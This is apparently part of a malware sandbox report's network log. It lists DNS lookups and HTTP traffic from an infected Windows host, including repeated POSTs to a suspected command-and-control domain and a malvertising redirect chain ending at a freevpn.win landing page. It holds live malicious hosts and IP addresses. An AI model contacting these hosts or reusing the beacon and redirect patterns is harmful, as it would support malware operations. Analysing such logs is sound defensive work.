                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 109
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:11:50 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 7
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 247
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:11:50 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          vexacion.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          vexacion.com
                                                                                          IN A
                                                                                          Response
                                                                                          vexacion.com
                                                                                          IN A
                                                                                          139.45.197.236
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://vexacion.com/afu.php?zoneid=1851483
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          139.45.197.236:80
                                                                                          Request
                                                                                          GET /afu.php?zoneid=1851483 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: vexacion.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:12:58 GMT
                                                                                          Content-Type: text/html; charset=utf8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Trace-Id: 766a7edc860c34a106e8e19076152d5c
                                                                                          Link: <https://propeller-tracking.com>; rel="preconnect dns-prefetch",<https://my.rtmark.net>; rel="preconnect dns-prefetch"
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                          Timing-Allow-Origin: *
                                                                                          Set-Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; expires=Sat, 09 Jul 2022 23:12:58 GMT; path=/
                                                                                          Set-Cookie: oaidts=1625872378; expires=Sat, 09 Jul 2022 23:12:58 GMT; path=/
                                                                                          Set-Cookie: syncedCookie=; expires=Tue, 10 Nov 2009 23:00:00 GMT
                                                                                          Strict-Transport-Security: max-age=1
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Timing-Allow-Origin: *
                                                                                          Content-Encoding: gzip
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://vexacion.com/?z=1851483&syncedCookie=true
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          139.45.197.236:80
                                                                                          Request
                                                                                          POST /?z=1851483&syncedCookie=true HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: http://vexacion.com/afu.php?zoneid=1851483&var=1851483&rid=3V3cJ5LEtuPAKYxz6tD_Kw%3D%3D
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: vexacion.com
                                                                                          Content-Length: 540
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; oaidts=1625872378
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Trace-Id: 0c46dc3c2fc8805e060571e13ce6ffd3
                                                                                          Link: <https://ssl.xdisctracking.pw>; rel="preconnect dns-prefetch",<https://propeller-tracking.com>; rel="preconnect dns-prefetch"
                                                                                          Referrer-Policy: no-referrer
                                                                                          Location: https://ssl.xdisctracking.pw/tracking202/redirect/rtr.php?t202id=44563&c1=437503065499636034&c2=PA_POP_1851483&t202kw=PA_POP_1851483
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                          Timing-Allow-Origin: *
                                                                                          Set-Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; expires=Sat, 09 Jul 2022 23:12:59 GMT; path=/
                                                                                          Set-Cookie: oaidts=1625872378; expires=Sat, 09 Jul 2022 23:12:59 GMT; path=/
                                                                                          Set-Cookie: syncedCookie=true; expires=Fri, 16 Jul 2021 23:12:59 GMT; path=/
                                                                                          Strict-Transport-Security: max-age=1
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Timing-Allow-Origin: *
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          my.rtmark.net
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          my.rtmark.net
                                                                                          IN A
                                                                                          Response
                                                                                          my.rtmark.net
                                                                                          IN A
                                                                                          139.45.195.8
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://vexacion.com/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          139.45.197.236:80
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: vexacion.com
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 204 No Content
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:12:57 GMT
                                                                                          Connection: keep-alive
                                                                                          Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                          Cache-Control: max-age=315360000
                                                                                          Pragma: public
                                                                                          Cache-Control: public, must-revalidate, proxy-revalidate
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://vexacion.com/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          139.45.197.236:80
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: vexacion.com
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 204 No Content
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:12:58 GMT
                                                                                          Connection: keep-alive
                                                                                          Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                          Cache-Control: max-age=315360000
                                                                                          Pragma: public
                                                                                          Cache-Control: public, must-revalidate, proxy-revalidate
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://my.rtmark.net/img.gif?f=merge&userId=3819b934f4054333861a9d6dc9a564e4
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          139.45.195.8:443
                                                                                          Request
                                                                                          GET /img.gif?f=merge&userId=3819b934f4054333861a9d6dc9a564e4 HTTP/2.0
                                                                                          host: my.rtmark.net
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: http://vexacion.com/afu.php?zoneid=1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          server: nginx
                                                                                          date: Fri, 09 Jul 2021 23:12:58 GMT
                                                                                          content-type: image/gif
                                                                                          content-length: 43
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                          access-control-allow-headers: Accept, Content-Type, Content-Length, Accept-Encoding, Authorization,X-CSRF-Token
                                                                                          access-control-expose-headers: Authorization
                                                                                          access-control-allow-credentials: true
                                                                                          timing-allow-origin: *
                                                                                          set-cookie: ID=3819b934f4054333861a9d6dc9a564e4; expires=Sat, 09 Jul 2022 23:12:58 GMT; secure; SameSite=None
                                                                                          strict-transport-security: max-age=1
                                                                                          x-content-type-options: nosniff
                                                                                          timing-allow-origin: *
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Cache-Control: no-cache
                                                                                          Connection: Keep-Alive
                                                                                          Pragma: no-cache
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 1189
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          ssl.xdisctracking.pw
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          ssl.xdisctracking.pw
                                                                                          IN A
                                                                                          Response
                                                                                          ssl.xdisctracking.pw
                                                                                          IN A
                                                                                          104.21.59.88
                                                                                          ssl.xdisctracking.pw
                                                                                          IN A
                                                                                          172.67.220.164
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://ssl.xdisctracking.pw/tracking202/redirect/rtr.php?t202id=44563&c1=437503065499636034&c2=PA_POP_1851483&t202kw=PA_POP_1851483
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.21.59.88:443
                                                                                          Request
                                                                                          GET /tracking202/redirect/rtr.php?t202id=44563&c1=437503065499636034&c2=PA_POP_1851483&t202kw=PA_POP_1851483 HTTP/2.0
                                                                                          host: ssl.xdisctracking.pw
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          referer: http://vexacion.com/afu.php?zoneid=1851483&var=1851483&rid=3V3cJ5LEtuPAKYxz6tD_Kw%3D%3D
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: text/html; charset=UTF-8
                                                                                          set-cookie: tracking202subid=186205267; expires=Sun, 08-Aug-2021 23:12:59 GMT; Max-Age=2592000; path=/; domain=51.68.34.45
                                                                                          set-cookie: tracking202subid_a_335=186205267; expires=Sun, 08-Aug-2021 23:12:59 GMT; Max-Age=2592000; path=/; domain=51.68.34.45
                                                                                          location: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          cf-cache-status: DYNAMIC
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=hdX9Qp0sMKJ6lOwYb6LByMoja30V1zGOGmbJRm%2FmOgmSdjTV4qYqXR7gdbf8jPlM9R7llIFWIwOcRszu6IjDRXSaW0pVrqquVBjeIQGOZjuLrIi2w6M%2BhMcmAO1xPJomxHk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d8398aa0c19-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.freevpn.win
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.freevpn.win
                                                                                          IN A
                                                                                          Response
                                                                                          www.freevpn.win
                                                                                          IN A
                                                                                          172.67.185.200
                                                                                          www.freevpn.win
                                                                                          IN A
                                                                                          104.21.88.157
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483 HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          referer: http://vexacion.com/afu.php?zoneid=1851483&var=1851483&rid=3V3cJ5LEtuPAKYxz6tD_Kw%3D%3D
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: text/html
                                                                                          cf-railgun: direct (waiting for pending WAN connection)
                                                                                          last-modified: Thu, 08 Jul 2021 16:07:56 GMT
                                                                                          cf-cache-status: DYNAMIC
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Yg%2FZmjLXYjus32rr2mwoUxVHPJfZenuvNiEciOkr8DOP4IRKO9vYUUGK5vZz1lfMISyQjZq1%2FQ3aJY%2FyjT%2Ba0cS9gbyEfDiqpbo8U0B6EU1sGippGb0LCAZGQPU%2F"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d848aa40125-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/gbox-lp/lpbox.css?ts=9348934
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/gbox-lp/lpbox.css?ts=9348934 HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: text/css, */*
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: text/css
                                                                                          last-modified: Thu, 08 Jul 2021 16:07:50 GMT
                                                                                          etag: W/"60e722d6-1427"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 5753
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=eRjtSootKKfhwvELTM8f8I6LCXjrycoXiwZ2Bx4zag4V23UT090i%2FnZCn%2BBg5omCJ%2FKlKnf71HIppnpJms8o5cHbNMvOr4Tj%2FY9rB8d97AuuExSnsN0j7eQACz3I"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d853b700125-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/assist/assist.css?ts=388438544
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/assist/assist.css?ts=388438544 HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: text/css, */*
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: text/css
                                                                                          last-modified: Thu, 24 Jun 2021 20:01:08 GMT
                                                                                          etag: W/"60d4e484-474"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 4834
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=y2dMPgD2wSuCut4%2BJKdQ%2FOzKQM4I7wZlvqoa6OdiuX3jcanKQyt1qboxnHyGiOmkDpJPYolDhQyNMAwpJfyXss7XnzvL%2FM9eQeeYDbxnXF4PXjopIxqpkCgsvaMi"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d853b760125-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/gbox-lp/logo-72x72.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/gbox-lp/logo-72x72.png HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: image/png
                                                                                          content-length: 3371
                                                                                          last-modified: Thu, 08 Jul 2021 11:58:25 GMT
                                                                                          etag: "60e6e861-d2b"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 5753
                                                                                          accept-ranges: bytes
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=w%2FW11uU0HonikllWtEFe%2BMuAywA4WhLiSsgbh4SokAEzSvjgcktJkxbiJ4osTchNALiPgDwkg0%2FO%2BtvddLcOu%2BHkiFvK3bGSkketO9Xb3AVXXv%2FRsv4L9stM8it9"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d854b7c0125-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: application/javascript
                                                                                          last-modified: Wed, 07 Jul 2021 15:32:55 GMT
                                                                                          etag: W/"60e5c927-4d7"
                                                                                          cf-request-id: 0b2f24c760000001253d86d000000001
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=VxgjcX6NWI6cRPI2p43rVNTksvfnujrZV0MpEoc5UnsB623%2BYSlKMr1MRf%2BvRbEygr092O78pgSrXJ5MtXBJgMdBC7zvIhUgeCxBk%2BPyj%2FfjN5uZKiyYQPtkoirH"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d856b9f0125-AMS
                                                                                          x-frame-options: DENY
                                                                                          x-content-type-options: nosniff
                                                                                          expires: Sun, 11 Jul 2021 23:12:59 GMT
                                                                                          cache-control: max-age=172800
                                                                                          cache-control: public
                                                                                          content-encoding: gzip
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/dlcommon.js?ts=2345535677
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/dlcommon.js?ts=2345535677 HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: application/javascript
                                                                                          last-modified: Thu, 24 Jun 2021 20:00:14 GMT
                                                                                          etag: W/"60d4e44e-1295"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 4834
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=6%2BM5RQ4X7%2F8orSvth2vZ08AWeiZ6ambYQONGyo6DXOxijjyExsb5aXgij%2BRj3Of9p0qZBWq41vBqSd614h5HQlZI4JAn4Z3rInn%2BxUGkLch84FbQg3CKxsfgv7jV"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d85abea0125-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/gbox-lp/fonts/helveticaneueltstd-roman_0-webfont.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/gbox-lp/fonts/helveticaneueltstd-roman_0-webfont.woff HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: */*
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.freevpn.win
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: application/font-woff
                                                                                          last-modified: Thu, 08 Jul 2021 11:54:41 GMT
                                                                                          etag: W/"60e6e781-672c"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 5721
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
